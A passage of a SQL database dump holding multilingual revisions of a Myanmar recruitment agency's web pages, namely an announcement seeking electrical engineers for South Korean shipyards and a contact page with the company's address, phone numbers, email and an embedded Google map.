dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 358, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('announcement', 0, 10, 358, 'ja', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><p>韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。<br>電気エンジニア<br>1)資格&nbsp;<br>大学の学士号またはそれ以上の学位 + その分野での1年の経験<br>&nbsp; &nbsp;コミュニティカレッジの学位 + その分野での5年の経験</p><p>2)関連する学位と経験<br>学位: 電子工学、電力工学</p><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 358, 'ko', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('page', 0, 11, 17, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p>No.201, ပန်းဆိုးတန်းလမ်းမကြီး၊ အောင်ဆန်းကွင်းအရှေ့ဘက်၊ Yangon, Myanmar.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>Phone: 09 5556677&nbsp;<br>Email: newcometagency@gmail.com</p>', '', 'full_html'),
('page', 0, 11, 18, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><a>No.201, ပန်းဆိုးတန်းလမ်းမကြီး၊ အောင်ဆန်းကွင်းအရှေ့ဘက်၊ Yangon, Myanmar.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a>&nbsp;<br>Phone: 09 5556677&nbsp;&nbsp;&nbsp;<br>Email: newcometagency@gmail.com</p>', '', 'full_html'),
('page', 0, 11, 19, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p>No.201, ပန်းဆိုးတန်းလမ်းမကြီး၊ အောင်ဆန်းကွင်းအရှေ့ဘက်၊ Yangon, Myanmar.<br>Phone: 09 5556677<br>Email: <a>newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 20, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p>No.201, ပန်းဆိုးတန်းလမ်းမကြီး၊ အောင်ဆန်းကွင်းအရှေ့ဘက်၊ Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 55, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p>No.201, ပန်းဆိုးတန်းလမ်းမကြီး၊ အောင်ဆန်းကွင်းအရှေ့ဘက်၊ Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 01 8393300<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 63, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 79, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 89, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 89, 'ja', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 90, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 90, 'ja', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 90, 'ko', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 232, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 232, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 232, 'ko', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 234, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
